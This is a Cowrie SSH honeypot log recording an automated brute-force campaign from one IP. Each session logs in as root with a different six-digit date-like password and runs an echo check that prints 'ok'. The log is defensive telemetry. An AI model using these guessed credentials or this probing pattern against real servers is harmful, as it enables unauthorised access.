{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:34.313586Z","src_ip":"212.227.125.160","session":"d79ea593f793"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:34.314703Z","src_ip":"212.227.125.160","session":"d79ea593f793"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34546,"dst_ip":"1.2.3.4","dst_port":22,"session":"a3c84cd384d1","protocol":"ssh","message":"New connection: 212.227.125.160:34546 (1.2.3.4:22) [session: a3c84cd384d1]","sensor":"my-vps","timestamp":"2025-08-26T10:28:37.442245Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:37.553868Z","src_ip":"212.227.125.160","session":"a3c84cd384d1"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:37.575802Z","src_ip":"212.227.125.160","session":"a3c84cd384d1"}
{"eventid":"cowrie.login.success","username":"root","password":"281184","message":"login attempt [root/281184] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:38.051269Z","src_ip":"212.227.125.160","session":"a3c84cd384d1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:38.251394Z","src_ip":"212.227.125.160","session":"a3c84cd384d1"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:38.252148Z","src_ip":"212.227.125.160","session":"a3c84cd384d1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:38.333829Z","src_ip":"212.227.125.160","session":"a3c84cd384d1"}
{"eventid":"cowrie.session.closed","duration":"0.9","message":"Connection lost after 0.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:38.335218Z","src_ip":"212.227.125.160","session":"a3c84cd384d1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":34552,"dst_ip":"1.2.3.4","dst_port":22,"session":"7dce283eee32","protocol":"ssh","message":"New connection: 212.227.125.160:34552 (1.2.3.4:22) [session: 7dce283eee32]","sensor":"my-vps","timestamp":"2025-08-26T10:28:38.419348Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:38.474944Z","src_ip":"212.227.125.160","session":"7dce283eee32"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:38.477677Z","src_ip":"212.227.125.160","session":"7dce283eee32"}
{"eventid":"cowrie.login.success","username":"root","password":"280388","message":"login attempt [root/280388] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:38.735498Z","src_ip":"212.227.125.160","session":"7dce283eee32"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:38.867109Z","src_ip":"212.227.125.160","session":"7dce283eee32"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:38.867819Z","src_ip":"212.227.125.160","session":"7dce283eee32"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:38.896919Z","src_ip":"212.227.125.160","session":"7dce283eee32"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:38.898100Z","src_ip":"212.227.125.160","session":"7dce283eee32"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53340,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb5bfef7d928","protocol":"ssh","message":"New connection: 212.227.125.160:53340 (1.2.3.4:22) [session: bb5bfef7d928]","sensor":"my-vps","timestamp":"2025-08-26T10:28:38.918861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:38.921143Z","src_ip":"212.227.125.160","session":"bb5bfef7d928"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:38.942222Z","src_ip":"212.227.125.160","session":"bb5bfef7d928"}
{"eventid":"cowrie.login.success","username":"root","password":"271283","message":"login attempt [root/271283] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.043136Z","src_ip":"212.227.125.160","session":"bb5bfef7d928"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:39.151221Z","src_ip":"212.227.125.160","session":"bb5bfef7d928"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.151911Z","src_ip":"212.227.125.160","session":"bb5bfef7d928"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.178637Z","src_ip":"212.227.125.160","session":"bb5bfef7d928"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.179663Z","src_ip":"212.227.125.160","session":"bb5bfef7d928"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53350,"dst_ip":"1.2.3.4","dst_port":22,"session":"8ec9446f092c","protocol":"ssh","message":"New connection: 212.227.125.160:53350 (1.2.3.4:22) [session: 8ec9446f092c]","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.200291Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.200967Z","src_ip":"212.227.125.160","session":"8ec9446f092c"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.223667Z","src_ip":"212.227.125.160","session":"8ec9446f092c"}
{"eventid":"cowrie.login.success","username":"root","password":"270986","message":"login attempt [root/270986] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.298495Z","src_ip":"212.227.125.160","session":"8ec9446f092c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:39.363642Z","src_ip":"212.227.125.160","session":"8ec9446f092c"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.364401Z","src_ip":"212.227.125.160","session":"8ec9446f092c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.387836Z","src_ip":"212.227.125.160","session":"8ec9446f092c"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.388928Z","src_ip":"212.227.125.160","session":"8ec9446f092c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53352,"dst_ip":"1.2.3.4","dst_port":22,"session":"020b8b052fb4","protocol":"ssh","message":"New connection: 212.227.125.160:53352 (1.2.3.4:22) [session: 020b8b052fb4]","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.409476Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.410142Z","src_ip":"212.227.125.160","session":"020b8b052fb4"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.433370Z","src_ip":"212.227.125.160","session":"020b8b052fb4"}
{"eventid":"cowrie.login.success","username":"root","password":"270288","message":"login attempt [root/270288] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.509268Z","src_ip":"212.227.125.160","session":"020b8b052fb4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:39.629756Z","src_ip":"212.227.125.160","session":"020b8b052fb4"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.630440Z","src_ip":"212.227.125.160","session":"020b8b052fb4"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.654352Z","src_ip":"212.227.125.160","session":"020b8b052fb4"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.655649Z","src_ip":"212.227.125.160","session":"020b8b052fb4"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53364,"dst_ip":"1.2.3.4","dst_port":22,"session":"197fd52d08af","protocol":"ssh","message":"New connection: 212.227.125.160:53364 (1.2.3.4:22) [session: 197fd52d08af]","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.676171Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.676963Z","src_ip":"212.227.125.160","session":"197fd52d08af"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.699496Z","src_ip":"212.227.125.160","session":"197fd52d08af"}
{"eventid":"cowrie.login.success","username":"root","password":"261283","message":"login attempt [root/261283] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.771227Z","src_ip":"212.227.125.160","session":"197fd52d08af"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:39.835002Z","src_ip":"212.227.125.160","session":"197fd52d08af"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.836011Z","src_ip":"212.227.125.160","session":"197fd52d08af"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.861342Z","src_ip":"212.227.125.160","session":"197fd52d08af"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.862415Z","src_ip":"212.227.125.160","session":"197fd52d08af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53366,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d514af35ea3","protocol":"ssh","message":"New connection: 212.227.125.160:53366 (1.2.3.4:22) [session: 4d514af35ea3]","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.883099Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.883855Z","src_ip":"212.227.125.160","session":"4d514af35ea3"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:39.907761Z","src_ip":"212.227.125.160","session":"4d514af35ea3"}
{"eventid":"cowrie.login.success","username":"root","password":"260987","message":"login attempt [root/260987] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.027114Z","src_ip":"212.227.125.160","session":"4d514af35ea3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:40.093247Z","src_ip":"212.227.125.160","session":"4d514af35ea3"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.094037Z","src_ip":"212.227.125.160","session":"4d514af35ea3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.117773Z","src_ip":"212.227.125.160","session":"4d514af35ea3"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.119134Z","src_ip":"212.227.125.160","session":"4d514af35ea3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53376,"dst_ip":"1.2.3.4","dst_port":22,"session":"0ca20b3c7897","protocol":"ssh","message":"New connection: 212.227.125.160:53376 (1.2.3.4:22) [session: 0ca20b3c7897]","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.139466Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.140303Z","src_ip":"212.227.125.160","session":"0ca20b3c7897"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.162578Z","src_ip":"212.227.125.160","session":"0ca20b3c7897"}
{"eventid":"cowrie.login.success","username":"root","password":"260981","message":"login attempt [root/260981] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.236853Z","src_ip":"212.227.125.160","session":"0ca20b3c7897"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:40.342420Z","src_ip":"212.227.125.160","session":"0ca20b3c7897"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:40.343133Z","src_ip":"212.227.125.160","session":"0ca20b3c7897"}
